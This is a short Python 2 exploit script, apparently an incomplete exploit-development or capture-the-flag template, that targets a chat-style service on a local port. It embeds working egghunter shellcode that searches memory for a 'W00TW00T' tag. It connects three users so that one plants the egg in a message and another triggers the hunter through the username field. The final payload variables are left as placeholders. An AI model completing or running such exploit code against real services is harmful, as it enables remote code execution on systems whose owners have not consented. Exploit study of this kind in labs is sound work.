#!/usr/bin/python
import os
import socket
import sys
import threading
import struct
import time

HOST="127.0.0.1"
PORT=2501

# Matt Miller Access() egghunter, triggers on "W00TW00T"
egghunter = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
egghunterPayload = ?
msgPayload = ?

# Connect one user
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock1.connect((HOST, PORT))
sock1.send("usr1\r\n")
sock1.recv(1024)
print "Connected first user"

# Connect a second user and message the first with the egg
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock2.connect((HOST, PORT))
sock2.send("usr2\r\n")
sock2.recv(1024)
time.sleep(1)
print "Connected second user"
sock2.send(msgPayload)
print "Sent msg payload"

# Connect a final user to trigger egghunter in username
sock3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock3.connect((HOST, PORT))
sock3.send(egghunterPayload)
print "Sent egghunter payload"

# Close down
sock3.close()
sock2.close()
sock1.close()